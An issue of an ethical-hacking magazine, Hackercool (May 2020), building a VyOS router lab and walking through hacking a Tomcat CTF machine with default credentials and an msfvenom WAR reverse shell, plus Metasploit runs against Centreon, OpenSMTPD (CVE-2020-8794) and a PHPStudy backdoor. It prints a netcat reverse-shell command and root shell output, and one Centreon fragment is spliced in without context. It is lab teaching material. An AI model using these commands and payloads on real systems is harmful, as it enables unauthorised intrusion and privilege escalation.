Hackercool
Cyber Security Magazine
May 2020 Edition 3 Issue 5
Over 10 Metasploit exploit modules explained.
HACKSTORY: Kronos
Part 2: Writing your own exploit.
Linux Privilege Escalation (Cont'd)
"Then you will know the truth and the truth will set you free."
John 8:32
Editor's Note
Hello aspiring ethical hackers. Hope you are all awesome and safe. We are back with our May 2020 Issue. With this Issue we will be delving into the main goal of our Magazine: simulating real world hacking scenarios. This has always been our goal and we have not lost sight of it at all. Since we have completed all our pending Issues we are right back on our target. These scenarios will help our readers understand how hacking takes place in the real world. For a start, we will deal with a scenario where a web server is behind a router but on another network. We will be creating this lab in VMware and VirtualBox, which means our readers can easily simulate it on their software. The target is a simple one this time, but we want our readers to learn some important things here like port forwarding, SNAT and DNAT etc. These are some of the networking topics that you will see in the real world and knowledge of them is very important. Once you are through it, we can move on to simulating complex networks.
In part 2 of our Buffer Overflow tutorial, our readers will learn how to write a simple buffer overflow exploit for the vulnerability we saw in our previous Issue. You will be doing this in Python.
Apart from this, other regular features are present. We are sure our readers will like this Issue. That's all we have for now. Until the next issue, Good Bye. Thank You. Stay Home, Stay Safe.
oh chakravanthe
"THERE'S A MISCONCEPTION THAT TO BE A SECURITY EXPERT YOU MUST DABBLE IN THE DARK SIDE. IT'S NOT TRUE. YOU CAN LEARN EVERYTHING YOU NEED TO KNOW LEGALLY. STICK TO THE GOOD SIDE."
- MARCUS HUTCHINS
INSIDE
See what our Hackercool Magazine May 2020 Issue has in store for you.
1. Real World Hacking Scenario :
Creating a Real World Hacking Lab involving a router and hacking a machine behind it.
2. Fixit :
Fixing the "cannot load bundler" error while starting Metasploit Framework.
3. Metasploit This Month :
Ten different exploit modules. Can't name every one here.
4. Hacking Q&A :
Answers to questions our readers ask.
5. Buffer Overflow Explained :
PART 2 : Writing the first buffer overflow exploit.
6. Linux Privilege Escalation (cont'd) :
Exploiting Cron jobs and SUID bits.
7. What's New :
Some new changes that came in cyber security.
8. Online Security :
Charging your phone using a public USB port? Beware of 'juice jacking'.
9. Hackstory :
Kronos.
CREATING A REAL WORLD HACKING LAB AND HACKING IT
REAL WORLD HACKING SCENARIO
For someone who is learning ethical hacking or penetration testing, many doubts and questions arise. Some of these questions include: how to hack a system behind a router or a firewall, how to do penetration testing over the internet, how to hack if our attacker system is behind a router, how to do hacking when both systems are in different LANs, what an IDS, IPS and Honeypot are, etc. Most ethical hacking courses perform their hacking scenarios with the attacker and victim systems in the same LAN. That's easy to simulate and also easy to hack, but those scenarios are very far from the real world. So we have decided to bring (or maybe the correct word is resuscitate) a feature called Real World Hacking Scenario (RWHS). Here we will simulate some real world hacking scenarios so that our readers can get some real world experience of ethical hacking. We want to make it a comprehensive tutorial, and for this we will be teaching our readers how to create the lab themselves and simulate the attack.
The first scenario we will be creating is a simple one: a web server behind a router. Most of the time we will not see a web server behind a home router, as nowadays they are hosted separately on dedicated servers (Bluehost, GoDaddy etc). But there may be some cases where users want to host a web server in their home out of enthusiasm or curiosity, or just because they want to save some cash. It is this scenario we are simulating. The main thing readers should focus on here is learning how to create the lab on virtualization software.
In this scenario, we will create an Apache Tomcat server that is hosted behind a router. Imagine there is a common user who wants to set up a Tomcat web server at his home. As usual, many homes have a router nowadays. This scenario has two parts: 1. Creation of the Vulnerable Lab and 2. Hacking into the target machine.
1. Creation Of The Vulnerable Lab.
This is the picture of the lab we are going to create.
[Lab diagram: Attacker System (Kali Linux), IP address 192.168.36.128; Vyos router, External IP 192.168.36.152, internal IP 192.168.55.1; Target System (My Tomcat Host), IP address 192.168.55.10]
We need three virtual machines for this lab apart from the virtualization software (VMware or VirtualBox). They are
1. Kali Linux (Attacker system) (assuming already installed)
2. Vyos (Router or Gateway) https://www.vyos.io/rolling-release/
3. My Tomcat Host (CTF Machine) https://www.vulnhub.com/entry/my-tomcat-host-1,457/
Vyos is open source router and firewall software that can be installed just like any other ISO file. It can be downloaded from the link given above. My Tomcat Host is a CTF machine created by Akanksha Dev Verma and can be downloaded from Vulnhub at the link given above. It's just like any other CTF challenge we undertook in many of our previous Issues, but the only difference here is that the target is on another network.
First install the Vyos ISO in VMware or VirtualBox with general specifications. Since Vyos will function as a gateway or router, it needs two network adapters: one for the external and another for the internal network. Whether you are installing Vyos in VMware or VirtualBox, it already gets one network adapter by default (mostly NAT). We need to set the second network adapter manually. Let's see how to add a second network adapter in both VirtualBox and VMware.
In VirtualBox, hit "Ctrl+H" or go to the File menu and select "Host Network Manager". A window opens. It shows all the host networks present. To create a new host network, click on "Create". It will automatically create a new host network. Here it created host network 5.
[Screenshot: VirtualBox Host Network Manager showing the new host-only adapter #5 with IPv4 address 192.168.212.1, network mask 255.255.255.0 and the DHCP server not enabled]
It is assigned an IP address automatically by VirtualBox. You can change the IP address if you want.
All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected], or get to us at our Facebook Page Hackercool Magazine, or tweet us at @hackercoolmagz.
[Screenshot: the adapter configured manually with IPv4 address 192.168.66.1]
Make sure that the DHCP server is not enabled for this network.
[Screenshot: Host Network Manager, DHCP Server tab, with "Enable Server" unchecked]
For the changes to take effect, click on "Apply" and then click on "Close" to close the window. Now open the Vyos virtual machine settings, go to network settings, enable the second network adapter and select host network adapter 5. Click on "OK".
[Screenshot: VirtualBox settings for the Vyos VM, Network tab, Adapter 2 enabled and attached to the host-only adapter]
Let's see how to add the second network adapter in VMware Workstation. Once Vyos is installed, go to the virtual machine settings, click on "Add" and select a network adapter. This would be "NAT" by default.
Change it to "Custom" and select any network from vmnet2 to vmnet7, or vmnet9 to vmnet19. vmnet1 is reserved for the default host-only network and vmnet8 is reserved for the NAT network, so don't select those. Here we selected vmnet3. Click on "OK". Go to the "Edit" menu and open the Virtual Network Editor. Click on "Add Network".
[Screenshot: VMware Virtual Network Editor listing vmnet0 (Bridged), vmnet1 (Host-only) and vmnet8 (NAT); "Add Network" adds vmnet3]
A new network will be created as highlighted below.
[Screenshot: the new network vmnet3 with subnet IP 192.168.65.0 and subnet mask 255.255.255.0]
Click on the new network "vmnet3" to make changes to the network and disable the DHCP server by unchecking the box below. You can change the subnet IP. We changed it to the IP address 192.168.55.0.
[Screenshot: vmnet3 set to Host-only, "Use local DHCP service" unchecked, subnet IP 192.168.55.0, subnet mask 255.255.255.0]
That's it. Now, let's install the Vyos OS. Note that till now the Vyos operating system is running in Live mode and is not installed to the hard disk. Start the Vyos virtual machine.
Log in to the system. The default username and password are "vyos:vyos".
Type the command install image.
[Installer output]
Would you like to continue? (Yes/No) [Yes]: yes
For the most part, select the default options. Enter the password for the administrator as prompted.
[Installer output, abridged]
Creating filesystem on /dev/sda1: OK
Mounting /dev/sda1
Which one should I copy to sda? [/opt/vyatta/etc/config/config.boot]
password for user 'vyos':
Once GRUB is installed, the installation finishes. Use the command show interfaces to see the network interfaces.
vyos@vyos:~$ show interfaces
Codes: S - State, L - Link, u - Up, D - Down, A - Admin Down
[interface table: eth0 and eth1, no addresses assigned yet]
vyos@vyos:~$ configure
[edit]
vyos@vyos# set interfaces ethernet eth0 address dhcp
[edit]
Let's set the external interface to receive an IP address from the VMware DHCP server, as this is how the internet works: the default NAT network plays the role of the internet for us. Use the command in the above image to do this. Let's also set a description on the interface as shown below. The commands commit and save make the changes permanent.
vyos@vyos# set interfaces ethernet eth0 description <name>
[edit]
vyos@vyos# commit
[edit]
vyos@vyos# save
Now let's set the internal interface's (eth1) IP address. Unlike eth0, and as is normal in LANs, the router will run a DHCP server assigning IP addresses to the clients of the LAN. This can be set using the commands shown below.
vyos@vyos# set interfaces ethernet eth1 address 192.168.55.1/24
[edit]
vyos@vyos# set service dhcp-server shared-network-name eth1 authoritative
[edit]
vyos@vyos# set service dhcp-server shared-network-name eth1 subnet 192.168.55.0/24 default-router 192.168.55.1
[edit]
vyos@vyos# set service dhcp-server shared-network-name eth1 subnet 192.168.55.0/24 dns-server 192.168.55.1
[edit]
vyos@vyos# set service dhcp-server shared-network-name eth1 subnet 192.168.55.0/24 range 0 start 192.168.55.10
[edit]
vyos@vyos# set service dhcp-server shared-network-name eth1 subnet 192.168.55.0/24 range 0 stop 192.168.55.50
[edit]
vyos@vyos# commit
[edit]
vyos@vyos# save
These commands set the router's internal IP address to 192.168.55.1 and set this address as the default router and DNS server for the LAN. We also set that the IP addresses handed out on the LAN should start from 192.168.55.10 and end at 192.168.55.50. Use the commit and save commands once again to preserve the changes.
Now once again type show interfaces to see the IP addresses, and you will see the DHCP-assigned address on eth0 and 192.168.55.1/24 on eth1.
vyos@vyos:~$ show interfaces
Codes: S - State, L - Link, u - Up, D - Down, A - Admin Down
[interface table with the eth0 and eth1 addresses]
Now install (if you have not already installed it) the My Tomcat Host CTF machine and set its network adapter to the new host-only network we created at the start of the tutorial. Boot up the My Tomcat Host machine. Once it has successfully booted, ping it from the Vyos machine. Note that while setting up the DHCP server on the internal interface, we configured the assigned IP addresses to start from 192.168.55.10 and end at 192.168.55.50. Since My Tomcat Host is the first machine joining this network, its address will be 192.168.55.10. If we get a successful echo reply (as shown below), the internal network is set.
vyos@vyos:~$ ping 192.168.55.10
[ping output: echo replies from 192.168.55.10, 0% packet loss]
[Screenshot: the five firewall commands, including "rule 13 destination address '192.168.55.10'", followed by commit and save]
Let's see the commands in detail. In the first command we create a firewall ruleset named "whts in" and add rule number 13 with action "accept". This means we are setting a rule to accept connections. Since we have set a rule to accept connections, we need to specify for which address. The second command does exactly that: we want 192.168.55.10 (My Tomcat Host) to accept connections. Note that the rule names the internal address and not the router's external address, because destination NAT rewrites the destination before the firewall evaluates the packet. The third command specifies on which port to accept connections. Since the target is a Tomcat machine, the port we set is 8080 (Apache Tomcat listens on port 8080 by default). The fourth command sets which protocol to accept. Since it's a web server, tcp is enough. The fifth command applies this ruleset so the rule takes effect. Commit and save.
Now we have an Apache Tomcat web server in the internal network. What is the use of a web server if it is not accessible to everyone on the internet? So let's configure a DNAT on the router.
vyos@vyos# set nat destination rule 10 description 'Port Forward apache tomcat to 192.168.55.10'
[edit]
vyos@vyos# set nat destination rule 10 destination port 8080
[edit]
vyos@vyos# set nat destination rule 10 inbound-interface eth0
[edit]
vyos@vyos# set nat destination rule 10 protocol tcp
[edit]
vyos@vyos# set nat destination rule 10 tarnslation address 192.168.55.10
  Configuration path: nat destination rule 10 [tarnslation] is not valid
[edit]
vyos@vyos# set nat destination rule 10 translation address 192.168.55.10
[edit]
vyos@vyos# set nat destination rule 10 destination address 192.168.36.152
[edit]
vyos@vyos# set nat destination rule 10 translation port 8080
[edit]
vyos@vyos# commit
[edit]
vyos@vyos# save
Saving configuration to '/config/config.boot'...
With the first command, we are adding a description to a destination NAT rule which we gave the number 10. The second command specifies which port this rule is configured for. The third command specifies the interface (since we are allowing external machines to access an internal machine, this should be set on the inbound interface, i.e. eth0). The fourth command sets the protocol. The fifth and sixth commands specify the translation address and the destination address respectively. The seventh command specifies the translation port.
It means any packet that arrives at the destination address 192.168.36.152 on port 8080 will be forwarded to the internal IP address 192.168.55.10, port 8080, where our target is listening. This is also known as port forwarding, since we are forwarding port 8080 of the router to a port of an internal machine.
If you look at the network diagram, there are other devices too. They all need to access the internet, so we need to set up Source NAT. Let's set SNAT for the Tomcat Host. These are the commands to set up Source NAT.
vyos@vyos# set nat source rule 16 outbound-interface eth0
[edit]
vyos@vyos# set nat source rule 16 protocol 'all'
[edit]
vyos@vyos# set nat source rule 16 source addresss 192.168.55.10
  Configuration path: nat source rule 16 source [addresss] is not valid
[edit]
vyos@vyos# set nat source rule 16 source address 192.168.55.10
[edit]
vyos@vyos# set nat source rule 16 translation address 192.168.36.152
[edit]
The above commands translate traffic of all protocols from the internal machine with address 192.168.55.10 to the router's external address 192.168.36.152 as it leaves towards the outside network (i.e. the internet). Any other LAN host that needs internet access needs its own source rule (or a rule whose source address is the whole 192.168.55.0/24). With this the lab is ready. It's time for Hackercool to take over.
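The order in which the router applies DNAT, the firewall and SNAT is the part of this lab that trips people up, so here is a small model of it in Python. This is an added example, not code from the magazine or from the VyOS project: it encodes the three rules configured above (DNAT rule 10, firewall rule 13, SNAT rule 16) as data and pushes constructed packets through them in the same order netfilter does (PREROUTING DNAT, then FORWARD firewall, then POSTROUTING SNAT). The addresses are the lab's; the packet fields and rule dictionaries are this example's own simplification.

```python
"""Model of the Vyos lab router: DNAT, then forward firewall, then SNAT.

Added example (not from the article or VyOS). Rule tables mirror the
'set nat destination/source rule N ...' and firewall rule 13 statements.
"""
from dataclasses import dataclass, replace
from ipaddress import ip_address, ip_network
from typing import Optional

EXTERNAL_IP = "192.168.36.152"   # Vyos eth0, the address the attacker sees
ROUTER_LAN_IP = "192.168.55.1"   # Vyos eth1
TARGET_IP = "192.168.55.10"      # My Tomcat Host


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    proto: str      # "tcp", "udp", ...
    iface: str      # interface the packet arrived on


def matches(addr: str, spec: Optional[str]) -> bool:
    """VyOS address fields take a host or a prefix; None means 'any'."""
    if spec is None:
        return True
    return ip_address(addr) in ip_network(spec, strict=False)


# rule 10 from the article: port forward to the Tomcat host
DNAT_RULES = [
    {"inbound_interface": "eth0", "protocol": "tcp",
     "destination_address": EXTERNAL_IP, "destination_port": 8080,
     "translation_address": TARGET_IP, "translation_port": 8080},
]

# rule 13 from the article: accept tcp/8080 to the *internal* address
FIREWALL_IN = [
    {"action": "accept", "destination_address": TARGET_IP,
     "destination_port": 8080, "protocol": "tcp"},
]
FIREWALL_DEFAULT_ACTION = "drop"

# rule 16 from the article: hide the Tomcat host behind the external IP
SNAT_RULES = [
    {"outbound_interface": "eth0", "protocol": "all",
     "source_address": TARGET_IP, "translation_address": EXTERNAL_IP},
]


def apply_dnat(pkt: Packet, rules=DNAT_RULES) -> Packet:
    """PREROUTING: rewrite the destination before routing and before the firewall."""
    for r in rules:
        if (pkt.iface == r["inbound_interface"] and pkt.proto == r["protocol"]
                and matches(pkt.dst, r["destination_address"])
                and pkt.dport == r["destination_port"]):
            return replace(pkt, dst=r["translation_address"], dport=r["translation_port"])
    return pkt


def forward_allowed(pkt: Packet, rules=FIREWALL_IN, default=FIREWALL_DEFAULT_ACTION) -> bool:
    """FORWARD: evaluated on the already-translated packet; first match wins."""
    for r in rules:
        if (matches(pkt.dst, r["destination_address"])
                and pkt.dport == r["destination_port"]
                and (r["protocol"] == "all" or pkt.proto == r["protocol"])):
            return r["action"] == "accept"
    return default == "accept"


def apply_snat(pkt: Packet, out_iface: str, rules=SNAT_RULES) -> Packet:
    """POSTROUTING: rewrite the source of LAN traffic leaving eth0."""
    for r in rules:
        if (out_iface == r["outbound_interface"]
                and matches(pkt.src, r["source_address"])
                and (r["protocol"] == "all" or pkt.proto == r["protocol"])):
            return replace(pkt, src=r["translation_address"])
    return pkt


def handle_inbound(pkt: Packet, firewall=FIREWALL_IN) -> Optional[Packet]:
    """Packet from the internet side: DNAT, then firewall. None means dropped."""
    translated = apply_dnat(pkt)
    return translated if forward_allowed(translated, firewall) else None


def handle_outbound(pkt: Packet) -> Packet:
    """Packet from the LAN towards the internet, leaving via eth0."""
    return apply_snat(pkt, "eth0")


if __name__ == "__main__":
    # constructed packet: Kali (192.168.36.128) hitting the router's external 8080
    print(handle_inbound(Packet("192.168.36.128", EXTERNAL_IP, 8080, "tcp", "eth0")))
    print(handle_inbound(Packet("192.168.36.128", EXTERNAL_IP, 22, "tcp", "eth0")))
    print(handle_outbound(Packet(TARGET_IP, "93.184.216.34", 443, "tcp", "eth1")))
```

Two things the model makes visible. A firewall rule written against the router's external address (a common mistake) never matches, because by the time the FORWARD chain runs the destination is already 192.168.55.10; the page's rule 13 is written against the internal address for exactly that reason. And SNAT rule 16 only covers the Tomcat host, so a second LAN machine leaves eth0 with its private source address unless it gets a rule of its own.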
2. Hacking into the Target Machine.
Hi, I am Hackercool. I was casually scanning the network with Nmap to find any live hosts with some ports open when I found one.
[Nmap host discovery output]
Nmap scan report for 192.168.36.152
Host is up (0.0019s latency).
Nmap done: 31 IP addresses (1 host up) scanned in 2.84 seconds
hackercoolmagz@kali:~$
When I ran a verbose scan on this IP, I found one open port on the target. It was port 8080, generally used by Apache Tomcat, and the version of Tomcat running on this target is 9.0.31.
hackercoolmagz@kali:~$ nmap -sV -A 192.168.36.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 06:35 EDT
Nmap scan report for 192.168.36.152
Host is up (0.0015s latency).
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat 9.0.31
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.31
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
hackercoolmagz@kali:~$
Tomcat is an open source web server that provides a pure Java based web server and servlet container. The first version was released 21 years ago, in 1999. Although not very popular, it is estimated that Tomcat has around 0.2% of share among web servers. Some of the famous companies using Tomcat are Alibaba, Snapdeal and the Los Angeles Times (DON'T TRY THIS ATTACK ON THESE SITES. IT IS ILLEGAL). After checking in searchsploit and finding that this version of Tomcat has no known exploit, I ran a nikto scan on the target.
hackercoolmagz@kali:~$ nikto -h 192.168.36.152 -p 8080
- Nikto v2.1.6
+ Target IP:          192.168.36.152
+ Target Hostname:    192.168.36.152
+ Target Port:        8080
+ Server: No banner retrieved
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes configuration details.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /axis2/services/Version/getVersion: Apache Axis2 version identified.
+ /axis2/services/listServices: Apache Axis2 WebServices identified.
+ /axis2/axis2-web/index.jsp: Apache Axis2 Web Application identified.
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host
hackercoolmagz@kali:~$
Nikto found our Tomcat target configured with the default username and password. The default username and password of the Tomcat Manager application (the pair used in the example entries of Tomcat's tomcat-users.xml) are tomcat:tomcat. This is a never-ending problem in the real world: many users still use default credentials for web services.
Metasploit has a Tomcat manager login module (auxiliary/scanner/http/tomcat_mgr_login) to test if the target is using any common or default passwords. Be aware that Tomcat's default LockOutRealm locks an account for a while after repeated failed logins, so a long wordlist can lock out the very account you are testing.
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
[options table: BLANK_PASSWORDS, BRUTEFORCE_SPEED, DB_ALL_CREDS, DB_ALL_PASS, DB_ALL_USERS, PASSWORD, PASS_FILE (bundled Tomcat password list), Proxies, RHOSTS (required), RPORT 8080, SSL false, STOP_ON_SUCCESS false, TARGETURI /manager/html, THREADS 1, USERNAME, USERPASS_FILE (bundled Tomcat user/pass list), USER_AS_PASS, USER_FILE (bundled Tomcat user list), VERBOSE true, VHOST]
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.36.152
rhosts => 192.168.36.152
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.36.152:8080 - LOGIN FAILED: manager:manager (Incorrect)
[further failed attempts omitted]
[-] 192.168.36.152:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[+] 192.168.36.152:8080 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
As I have access to Tomcat now, let's log in using these default credentials.
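What the login module does under the hood is a series of HTTP Basic-auth requests to /manager/html, stopping at the first 200. The following is an added example (not the magazine's code and not Metasploit's): a small default-credential checker written against a constructed stand-in for a Tomcat manager that still accepts tomcat:tomcat, so it runs offline. The credential list is a constructed subset of what the module tries; FakeManager, start_fake_manager and demo are this example's own names.

```python
"""Default-credential check against the Tomcat Manager, with a local stand-in.

Added example, not from the article or Metasploit. The fake server below
only exists so the checker can be run without a real Tomcat.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed subset of the pairs tomcat_mgr_login tries by default.
DEFAULT_CREDS = [
    ("admin", "admin"), ("admin", "manager"), ("manager", "manager"),
    ("tomcat", "s3cret"), ("tomcat", "role1"), ("tomcat", "tomcat"),
    ("role1", "role1"),
]


def try_login(base_url, user, password, timeout=3.0):
    """One Basic-auth GET to /manager/html: True on 200, False on 401/403."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(f"{base_url}/manager/html",
                  headers={"Authorization": f"Basic {token}"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except HTTPError as err:
        if err.code in (401, 403):   # wrong password, or user lacks manager-gui
            return False
        raise


def find_default_creds(base_url, creds=DEFAULT_CREDS, stop_on_success=True):
    """Return the (user, password) pairs that log in; mirrors STOP_ON_SUCCESS."""
    found = []
    for user, password in creds:
        if try_login(base_url, user, password):
            found.append((user, password))
            if stop_on_success:
                break
    return found


# --- constructed stand-in for a manager app still shipping tomcat:tomcat ---
class FakeManager(BaseHTTPRequestHandler):
    VALID = "Basic " + base64.b64encode(b"tomcat:tomcat").decode()

    def do_GET(self):
        if self.path == "/manager/html" and self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Tomcat Web Application Manager")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_fake_manager():
    """Serve FakeManager on a random loopback port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def demo(stop_on_success=True):
    """Run the checker against the fake manager and return what it found."""
    srv, url = start_fake_manager()
    try:
        return find_default_creds(url, stop_on_success=stop_on_success)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())   # the constructed server accepts only tomcat:tomcat
```

Two caveats for real targets. A valid user without the manager-gui role gets a 403 from Tomcat, which this treats as a failure, so a "no hits" result does not prove the credentials are unknown. And since Tomcat 7 the default server.xml wraps the user database in a LockOutRealm, so hammering one username with a long list locks it out for minutes; the module's STOP_ON_SUCCESS and a short, targeted list (as here) keep that from happening.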
Now I can upload a malicious payload as a WAR archive containing a JSP application. Metasploit has two modules that can do that. They are
1. exploit/multi/http/tomcat_mgr_deploy
2. exploit/multi/http/tomcat_mgr_upload
[Screenshot: Tomcat Web Application Manager page after logging in]
So I used msfvenom to create the malicious WAR payload. I named it hcool.war. We have been using msfvenom a lot, so I am sure you can understand the syntax.
hackercoolmagz@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.36.128 LPORT=1234 -f war -o hcool.war
Final size of war file: 1090 bytes
hackercoolmagz@kali:~$
The payload is ready. To deploy it, scroll down on the target website and we can see an upload option as shown below.
After uploading the "hcool.war" payload I just created above, I clicked on the deploy button to complete the upload.
Before doing anything with the payload, I start a netcat listener on port 1234 to receive the incoming shell.
[Screenshot: netcat listening on port 1234]
On the target website, I scroll down to see my WAR archive.
[The next fragment belongs to a module run against a Centreon target; the pages between it and the Tomcat walkthrough are not present.]
msf5 exploit(...) > check
192.168.36.144:80 - This module does not support check.
msf5 exploit(...) > set lhost 192.168.36.128
lhost => 192.168.36.128
After all the options are set, execute the module.
msf5 exploit(...) > run
[*] Command shell session 1 opened (192.168.36.128:... -> 192.168.36.144:...) at 2020-05-07 17:53:42 -0400
[session output, abridged: the shell's groups include 998(centreon) and 999(nagios); uname reports Linux centreon-central 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020]
You should get a session as shown in the above image.
OpenSMTPD LPE Exploit Module
TARGET: OpenSMTPD < 6.6.4 on OpenBSD 6.6    TYPE: Local    FIREWALL: ON
OpenSMTPD is a free implementation of the server side of the SMTP protocol. SMTP is used to exchange mail messages. OpenSMTPD 6.6.0 has an out-of-bounds read vulnerability (CVE-2020-8794) which is exploited by this module to execute a command as either the root user or the nobody user, thus giving the user elevated privileges. Being a local exploit, the module needs an existing session on the target to work from.
Let's see how this exploit works. First let us get a low privileged shell on the OpenBSD system using the ssh_login module. Load the module as shown below.
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
[options table: BLANK_PASSWORDS, BRUTEFORCE_SPEED, DB_ALL_CREDS, DB_ALL_PASS, DB_ALL_USERS, PASSWORD, PASS_FILE, RHOSTS (required), RPORT 22, STOP_ON_SUCCESS, THREADS, USERNAME, USERPASS_FILE, USER_AS_PASS, USER_FILE, VERBOSE]
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.28.128.13
rhosts => 172.28.128.13
msf5 auxiliary(scanner/ssh/ssh_login) > set username ssh-user
username => ssh-user
msf5 auxiliary(scanner/ssh/ssh_login) > set password @Bcd1234
password => @Bcd1234
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 172.28.128.13:22 - Success: 'ssh-user:@Bcd1234'
[*] Command shell session 1 opened (172.28.128.3:... -> 172.28.128.13:22) at 2020-05-03 00:14:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
  Id  Name  Type        Information                                Connection
  --  ----  ----        -----------                                ----------
  1         shell unix  SSH ssh-user:@Bcd1234 (172.28.128.13:22)   172.28.128.3:... -> 172.28.128.13:22 (172.28.128.13)
We have a shell as a low privileged user. Now search for the opensmtpd modules.
msf5 auxiliary(scanner/ssh/ssh_login) > search opensmtpd
Matching Modules
================
   #  Name                                        Description
   -  ----                                        -----------
   0  exploit/unix/local/opensmtpd_oob_read_lpe   OpenSMTPD OOB Read Local Privilege Escalation
   1  exploit/unix/smtp/opensmtpd_mail_from_rce   OpenSMTPD MAIL FROM Remote Code Execution
Load the module.
msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show options
Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
[options table: SESSION (required, the session to run this module on), SRVHOST, SRVPORT (the local port to listen on), SSL, SSLCert (path to a custom SSL certificate), URIPATH]
Payload options (cmd/unix/reverse_netcat):
[LHOST (required, the listen address), LPORT (the listen port)]
Exploit target:
  Id  Name
  --  ----
  0   OpenSMTPD < 6.6.4 (automatic grammar selection)
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.28.128.3
lhost => 172.28.128.3
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > check
[!] SESSION may not be compatible with this module
[*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
[!] SESSION may not be compatible with this module
[*] Started reverse TCP handler on 172.28.128.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Sending: 220
[*] Expecting: /EHLO /
[SMTP exchange with the target's OpenSMTPD, abridged]
mda-exec: mkfifo /tmp/zdhgw; nc 172.28.128.3 4444 0</tmp/zdhgw | /bin/sh >/tmp/zdhgw 2>&1; rm /tmp/zdhgw; exit 0
[*] Disconnecting client 172.28.128.13:47665
[*] Command shell session 3 opened (172.28.128.3:4444 -> 172.28.128.13:44932) at 2020-05-03 00:17:16 -0400
id
uid=0(root) gid=0(wheel) ...
As you can see, we have root privileges now.
PHPStudy Backdoor Exploit Module
TARGET: PHPStudy with php-5.4.45 + Apache    TYPE: Remote
PHPStudy is free software that acts as an integration package for a PHP debugging environment. The PHPStudy package includes Apache, PHP, MySQL, phpMyAdmin, Zend Optimizer etc. It is a one-click installation package.
PHPStudy 2016 and PHPStudy 2018 versions are vulnerable to a backdoor. However, this vulnerability works only when the PHP version is 5.4.45 for PHPStudy 2016 and 5.2.17 for PHPStudy 2018. Let's see how this exploit works. The download link of the vulnerable software is given in our Github repository. Download the vulnerable software and install it on a Windows system as shown. We tested this on a Windows 7 system. Click on the part highlighted in the image below. Then load the phpstudy_backdoor_rce module as shown below.
msf5 > use exploit/multi/http/phpstudy_backdoor_rce
msf5 exploit(multi/http/phpstudy_backdoor_rce) > show options
Module options (exploit/multi/http/phpstudy_backdoor_rce):
[options table: Proxies, RHOSTS (required), RPORT 80, SSL false, TARGETURI /, VHOST]
Exploit target:
  Id  Name
  --  ----
  0   Automatic
